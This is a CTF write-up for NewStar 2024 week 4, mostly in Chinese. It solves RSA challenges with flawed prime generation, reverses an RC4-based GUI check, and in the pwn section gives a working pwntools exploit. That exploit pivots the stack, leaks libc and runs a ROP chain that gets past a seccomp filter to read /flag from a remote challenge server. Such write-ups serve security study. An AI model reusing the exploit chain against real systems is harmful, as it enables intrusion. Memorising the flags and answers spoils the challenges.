
[NewStar 2024] week4

Crypto

欧拉欧拉

这题给了很诡异的素数生成方式:x = ((1<<512)-1) ^ p 就是 p 的按位取反,q = x + i,所以 p 和 q 异或后基本是一串 1,题目还直接给出了这个差 i = -3。

# Placeholder flag: the real value is redacted in the published challenge source.
flag = b'flag{*********}'
# The flag bytes are turned into one big integer, which is the RSA plaintext below.
m = bytes_to_long(flag)


def get_prime(bits):
    """Return ``(p, q, i)`` where q is derived from p instead of being independent.

    p is a random prime from ``getPrime(bits)``; q is the first prime found at
    ``((2**bits - 1) ^ p) + i`` for i in -10..10. If no offset yields a prime,
    a fresh p is drawn and the search repeats.

    Security note: XOR with the all-ones mask is the bitwise complement, so for
    p < 2**bits it equals ``2**bits - 1 - p`` and therefore
    ``p + q == 2**bits - 1 + i``. Anyone who learns i knows p + q, hence
    phi(n) = n - (p + q) + 1, without factoring n. RSA primes must be
    generated independently of each other.
    """
    all_ones = (1 << bits) - 1
    while True:
        p = getPrime(bits)
        complement = all_ones ^ p
        for offset in range(-10, 11):
            candidate = complement + offset
            if isPrime(candidate):
                return p, candidate, offset


# q is derived from p inside get_prime; i is the small offset that was used.
p, q, i = get_prime(512)
n = p * q
e = 65537
# Textbook RSA: the flag integer is encrypted directly, with no padding scheme.
c = pow(m, e, n)

# Publishing i next to n is what breaks this instance: it discloses p + q
# (see get_prime), and phi(n) follows from n and p + q.
print("c =", c)
print("n =", n)
print("i =", i)
'''
c = 14859652090105683079145454585893160422247900801288656111826569181159038438427898859238993694117308678150258749913747829849091269373672489350727536945889312021893859587868138786640133976196803958879602927438349289325983895357127086714561807181967380062187404628829595784290171905916316214021661729616120643997
n = 18104347461003907895610914021247683508445228187648940019610703551961828343286923443588324205257353157349226965840638901792059481287140055747874675375786201782262247550663098932351593199099796736521757473187142907551498526346132033381442243277945568526912391580431142769526917165011590824127172120180838162091
i = -3
'''

因为 q = (1<<512) - 1 - p + i 且 i = -3,所以 p+q = (1<<512)-4,于是 phi = n - (p+q) + 1 可以直接算出,不需要分解 n。

#(q+3)^p = (1<<512)-1
from Crypto.Util.number import *

# p + q = (2**512 - 1) + i with the published offset i = -3.
p_q = (1<<512)-4
# phi(n) = (p-1)*(q-1) = n - (p+q) + 1, so n never has to be factored.
phi = n-p_q+1
# d = 65537^-1 mod phi; c^d mod n is the flag integer.
# c and n are the values printed by the challenge script.
long_to_bytes(int(pow(c,inverse_mod(65537,phi),n)))

#flag{y0u_really_kn0w_the_phi}

圣石匕首

给了一个很复杂的程序,没看懂,不过运行一下就出结果。

俱以我之名

函数 All_in_my_name 里构造了一个模 Golden_Oath,y 是 x 对这个模的逆。

题目输出的是 y 和 RSA 的模 n(Golden_Oath 本身没有给出)。

from Crypto.Util.number import *
from gmpy2 import *
import random

def pad(msg, nbits):
    """Wrap *msg* in random filler so the result is roughly *nbits* bits long.

    Layout of the returned bytes: first half of the filler, one 0x00 marker
    byte, *msg*, then the remaining filler. The filler holds
    ``nbits - 8*len(msg) - 8`` random bits, rounded up to whole bytes.

    Raises AssertionError when *msg* plus the marker byte does not fit in
    *nbits* bits.

    NOTE(review): the filler comes from the ``random`` module, which is not a
    cryptographically secure generator, and the fixed 0x00 + msg layout gives
    a solver a recognisable pattern to search for in candidate plaintexts.
    """
    filler_bits = nbits - 8 * len(msg) - 8
    assert filler_bits >= 0
    filler_len = (filler_bits + 7) // 8
    filler = random.getrandbits(filler_bits).to_bytes(filler_len, "big")
    split = len(filler) // 2
    return b"".join((filler[:split], b"\x00", msg, filler[split:]))

def All_in_my_name(p, q):
    """Return y, the inverse of the padded gift modulo a product built from p and q.

    The modulus Golden_Oath multiplies four shifted copies of p and four
    shifted copies of q, so it is close to (p*q)**4. The inverted value x is
    the module-level ``gift`` padded to a random size of at most 512 bits.

    Security note: x is tiny compared with the modulus, so x*y = 1 + k*Golden_Oath
    makes x/k a very good rational approximation of Golden_Oath/y, which is
    close to n**4/y. Publishing y therefore leaks x, and with it the modulus.

    NOTE(review): the lower bound passed to random.randint is the bit length
    of gift alone, without the 8 extra bits pad() needs, so pad() can raise
    AssertionError for small draws.
    """
    # Flavor text (game reference): after activating skill 3 <All in my name>,
    # Vina immediately summons "Golden_Oath" on the eight surrounding
    # deployable tiles, dealing true damage to RSA.
    p_factors = (p-114)*(p-514)*(p+114)*(p+514)
    q_factors = (q-1919)*(q-810)*(q+1919)*(q+810)
    Golden_Oath = p_factors*q_factors
    target_bits = random.randint(bytes_to_long(gift).bit_length(), 512)
    secret = bytes_to_long(pad(gift, target_bits))
    return inverse(secret, Golden_Oath)

# Placeholders: the real flag and gift are redacted in the published source.
flag = b'flag{?????}'
gift = b'?????'
# Published hint: gift starts with b'end', which gives a known prefix to look for.
assert gift[:3] == b'end'

# An ordinary 1024-bit RSA modulus from two independently generated 512-bit primes.
p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
# Textbook RSA: the flag integer is encrypted directly, with no padding scheme.
c = pow(bytes_to_long(flag), e,n)

print(f'n = {n}')
print(f'c = {c}')
# The extra output is the weakness: it is an inverse modulo a value derived from p and q.
print(f'All_in_my_name = {All_in_my_name(p, q)}')

'''
n = 141425071303405369267688583480971314815032581405819618511016190023245950842423565456025578726768996255928405749476366742320062773129810617755239412667111588691998380868379955660483185372558973059599254495581547016729479937763213364591413126146102483671385285672028642742654014426993054793378204517214486744679
c = 104575090683421063990494118954150936075812576661759942057772865980855195301985579098801745928083817885393369435101522784385677092942324668770336932487623099755265641877712097977929937088259347596039326198580193524065645826424819334664869152049049342316256537440449958526473368110002271943046726966122355888321
All_in_my_name = 217574365691698773158073738993996550494156171844278669077189161825491226238745356969468902038533922854535578070710976002278064001201980326028443347187697136216041235312192490502479015081704814370278142850634739391445817028960623318683701439854891399013393469200033510113406165952272497324443526299141544564964545937461632903355647411273477731555390580525472533399606416576667193890128726061970653201509841276177937053500663438053151477018183074107182442711656306515049473061426018576304621373895497210927151796054531814746265988174146635716820986208719319296233956243559891444122410388128465897348458862921336261068868678669349968117097659195490792407141240846445006330031546721426459458395606505793093432806236790060342049066284307119546018491926250151057087562126580602631912562103705681810139118673506298916800665912859765635644796622382867334481599049728329203920912683317422430015635091565073203588723830512169316991557606976424732212785533550238950903858852917097354055547392337744369560947616517041907362337902584102983344969307971888314998036201926257375424706901999793914432814775462333942995267009264203787170147555384279151485485660683109778282239772043598128219664150933315760352868905799949049880756509591090387073778041
'''

可以得到一个式子:x*y = k*Golden_Oath + 1 ≈ k*N^4(x 只有约 512 位,远小于这个模),所以 N^4/y ≈ x/k,可以对 N^4/y 作连分式展开,从渐近分数里求 x 和 k,求出 k 以后就能求出 Golden_Oath。

# y is the All_in_my_name value printed by the challenge.
y = All_in_my_name
# x*y = k*G + 1 ≈ k*N^4, so x/k ≈ N^4/y; solve with continued fractions.
f = continued_fraction(Integer(n^4) / Integer(y))
# Walk the convergents: the numerator is a candidate x, the denominator a candidate k.
for i in range(1,300):
    x = f.numerator(i)
    k = f.denominator(i)
    v = long_to_bytes(int(x))
    # pad() puts a 0x00 byte directly before gift, and gift starts with b'end'.
    if b'\0end' in v:
        print(v,k,x)
        break

#b'5`\xf4\xf6t\xa3\x00end1n9_A_G2@nd_Ov3RTu2e\x1c\x13"H\x0f\xc9' 56398712132783063027132828918468670442692437484816382768162819797891220782528221182512 103697213497220650500739251621743955651854455782387759691953279488676501281257640431561
# x*y ≡ 1 (mod G) means x*y - 1 = k*G, so G is recovered exactly.
G = (x*y-1)//k

然后得到两个式子,一个是 G 这个,另一个是 p*q==n,通过消元求出 p、q 的大概值,再用 Coppersmith 求 p(下面的代码里,高精度实数根取整后直接用 n%p==0 验证,并没有真正用到 Coppersmith)。

# Eliminate q over the rationals, then take approximate roots for p.
PR.<p,q> = PolynomialRing(QQ)
# f1 = 0 restates the recovered G; f2 = 0 restates n = p*q.
f1 = (p-114)*(p-514)*(p+114)*(p+514)*(q-1919)*(q-810)*(q+1919)*(q+810) -G
f2 = p*q - n 
# The determinant of the Sylvester matrix with respect to q is the resultant:
# a polynomial in p alone.
h = f1.sylvester_matrix(f2, q).det()
# Roots are computed with 1024-bit real precision and truncated to integers below.
res = h.change_ring(RealField(1024)).univariate_polynomial().monic().roots()
for i in res:
    # From here on p names the integer candidate, no longer the polynomial variable.
    p = abs(int(i[0]))
    # Accept only a candidate that really divides n.
    if n%p == 0:
        print(p)
        break

# Decrypt modulo p alone; this is valid only if the flag integer is smaller
# than p (presumably true for a flag this short).
long_to_bytes(int(pow(c,inverse_mod(65537,p-1),p)))
#b'flag{rE@L_d@m@9e_15_7h3_mo5t_au7hEn7ic_dam49E}'

PWN

ReRead

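这里有个明显的溢出,不过 seccomp 限制了只能用 open、write(规则里还放行了 dup2),并且 read 的第一个参数只能是 0。从下面的规则可以看到,其余系统调用也会落到同一条 args[0]==0 的检查上,所以 close(0) 同样能通过——这个过滤器缺少“其余一律 KILL”的默认规则。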

先做一次栈迁移,然后把 fd 0 close 掉再 open 文件,新打开的文件就会复用 fd 0,于是 read(0, ...) 读到的就是文件内容,最后 write 输出。

from pwn import *
context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')
elf = ELF('./pwn')

# NOTE(review): pop_rdi and base are assigned again further down; this first
# pop_rdi value is overwritten before it is ever used.
pop_rdi = 0x00000000004013e3 # pop rdi ; ret
base = 0x404800

#p = process('./pwn')
#gdb.attach(p, "b*0x4013cf\nc")
p = remote('8.147.132.32', 16814)

# Fixed gadget addresses inside the challenge binary.
pop_rbp = 0x000000000040117d # pop rbp ; ret
pop_rdi = 0x0000000000401473 # pop rdi ; ret
pop_rsi = 0x0000000000401471 # pop rsi ; pop r15 ; ret
leave_ret = 0x4013cf
# Scratch address used as the relocated stack.
base = 0x404800

# Stage 1: 0x40 filler bytes, then `base` and 0x4013ac land in the two slots
# after the buffer (presumably saved rbp and return address; confirm in the binary).
p.sendafter(b'\x9f\x98\x8b\n', b'A'*0x40 + flat(base, 0x4013ac))

# Stage 2: print the resolved puts address from the GOT, re-enter 0x4013ac with
# rbp = base+0x100, then pivot with leave;ret.
p.sendafter(b'done!\n',flat(pop_rdi, elf.got['puts'], elf.plt['puts'], pop_rbp,base+0x100,0x4013ac,0,0, base-0x40-8, leave_ret))
# Leaked puts address minus its offset in libc gives the libc load base.
libc.address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\0')) - libc.sym['puts']
print(f"{libc.address = :x}")

# Gadget offsets below are specific to the supplied libc.so.6.
pop_rax = libc.address + 0x0000000000036174 # pop rax ; ret
pop_rsi = libc.address + 0x000000000002601f # pop rsi ; ret
pop_rdx = libc.address + 0x0000000000119431 # pop rdx ; pop r12 ; ret
# NOTE(review): getpid+9 is presumably a `syscall` instruction in this libc build; verify per version.
syscall = libc.sym['getpid'] + 9
# Stage 3: read(0, base+0x100, 0x400) pulls in the final chain; the payload
# also carries the '/flag' path string.
p.send(flat(pop_rdi, 0, pop_rsi, base+0x100 ,pop_rdx, 0x400,b'/flag\0\0\0',libc.sym['read'], base+0x100-0x40-8, leave_ret))

# Final chain. Every call is one the seccomp filter accepts: first argument 0,
# or the syscall is open/write. After close(0) the opened file gets descriptor 0,
# so the later read(0, ...) satisfies the filter's args[0] == 0 rule.
p.send(flat([
    pop_rdi, 0, pop_rax,3, syscall, #close(0)
    pop_rdi, base+0x100-0x10, pop_rsi,0,pop_rax, 2, syscall,  #open
    pop_rdi, 0, pop_rsi, base-0x100, pop_rdx, 0x50,0, pop_rax, 0, syscall, #read
    pop_rdi, 1, pop_rax, 1, syscall
]))


p.interactive()

#open,read(0,),write
'''
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x06 0x00 0x40000000  if (A >= 0x40000000) goto 0010
 0004: 0x15 0x03 0x00 0x00000000  if (A == read) goto 0008
 0005: 0x15 0x05 0x00 0x00000001  if (A == write) goto 0011
 0006: 0x15 0x04 0x00 0x00000002  if (A == open) goto 0011
 0007: 0x15 0x03 0x00 0x00000021  if (A == dup2) goto 0011
 0008: 0x20 0x00 0x00 0x00000010  A = args[0]
 0009: 0x15 0x01 0x00 0x00000000  if (A == 0x0) goto 0011
 0010: 0x06 0x00 0x00 0x00000000  return KILL
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
'''

Maze_Rust

作完几天了,忘了,略

Sign in

MakeHero

REV

easygui

# Ciphertext bytes as signed values; reduce each one to the range 0..255.
enc = [
    value % 256
    for value in (
        -33,-57,77,20,-63,-20,8,-28,95,63,3,-76,-112,74,-71,-113,-113,-6,113,67,-57,-15,
        -99,-35,79,-64,18,68,92,-99,-120,54,45,22,29,-19,-68,-17,-69,91,-97,119,-21,88,
    )
]

# 128-entry substitution table used by the first encoding step.
dic = [
    0x31, 0x74, 0x54, 0x20, 0x03, 0x53, 0x78, 0x70, 0x3A, 0x35, 0x65, 0x42, 0x04, 0x6B, 0x1F, 0x43,
    0x06, 0x37, 0x00, 0x76, 0x21, 0x08, 0x0B, 0x13, 0x52, 0x4B, 0x2F, 0x1A, 0x59, 0x2C, 0x56, 0x51,
    0x7F, 0x3B, 0x0E, 0x05, 0x26, 0x15, 0x25, 0x63, 0x64, 0x7A, 0x3C, 0x29, 0x41, 0x2A, 0x12, 0x17,
    0x2E, 0x39, 0x57, 0x3D, 0x66, 0x33, 0x44, 0x6C, 0x6F, 0x47, 0x16, 0x71, 0x5F, 0x1C, 0x14, 0x5A,
    0x0C, 0x4F, 0x01, 0x30, 0x1B, 0x68, 0x0F, 0x62, 0x3F, 0x18, 0x69, 0x6D, 0x7E, 0x5D, 0x6A, 0x28,
    0x22, 0x5B, 0x55, 0x72, 0x09, 0x5E, 0x02, 0x3E, 0x50, 0x7B, 0x46, 0x45, 0x38, 0x10, 0x48, 0x79,
    0x60, 0x36, 0x61, 0x6E, 0x2D, 0x49, 0x7C, 0x2B, 0x34, 0x27, 0x11, 0x7D, 0x0D, 0x0A, 0x77, 0x73,
    0x58, 0x5C, 0x4C, 0x32, 0x4D, 0x1E, 0x24, 0x40, 0x67, 0x4A, 0x4E, 0x1D, 0x07, 0x75, 0x19, 0x23,
]

hexenc = bytes(enc).hex()
#'dfc74d14c1ec08e45f3f03b4904ab98f8ffa7143c7f19ddd4fc012445c9d88362d161dedbcefbb5b9f77eb58'

# The binary encodes in three steps: 1) table lookup, 2) rotate each 32-bit
# word right by 3, 3) RC4. Decoding below undoes them in reverse order.

# Step 3 undone: RC4 with the repeating key b"easy_GUI".
key = (b"easy_GUI" * 33)[:256]
sbox = list(range(256))
j = 0
for i in range(256):
    # Key scheduling: mix one key byte per position into the permutation.
    j = (j + sbox[i] + key[i]) % 256
    sbox[i], sbox[j] = sbox[j], sbox[i]

stream = []
a = 0
b_idx = 0
for _ in range(44):
    # Keystream generation: one output byte per ciphertext byte.
    a = (a + 1) % 256
    b_idx = (b_idx + sbox[a]) % 256
    sbox[a], sbox[b_idx] = sbox[b_idx], sbox[a]
    stream.append(sbox[(sbox[b_idx] + sbox[a]) % 256])

dec = [cipher_byte ^ key_byte for cipher_byte, key_byte in zip(enc, stream)]

# Step 2 undone: the encoder rotated right by 3, so rotate each big-endian
# 32-bit word left by 3.
rotated = []
for offset in range(0, len(dec), 4):
    word = int.from_bytes(bytes(dec[offset:offset + 4]), "big")
    word = ((word << 3) | (word >> 29)) & 0xFFFFFFFF
    rotated.extend(word.to_bytes(4, "big"))

# Step 1 undone: each byte is a table value; its position in dic is the plaintext byte.
m = list(map(dic.index, rotated))
print(bytes(m))
#flag{GU!_r3v3R5e_3nG1n3er1ng_i5_v3ry_s1mpl3}

PlzDebugMe

ezrust

MazE

洞OVO

感觉这周还可以,没大意思,好些找不着当时怎么作的了。中间有事不在,作了一晚上作完后再回来好像啥都没有了。先记这么多。
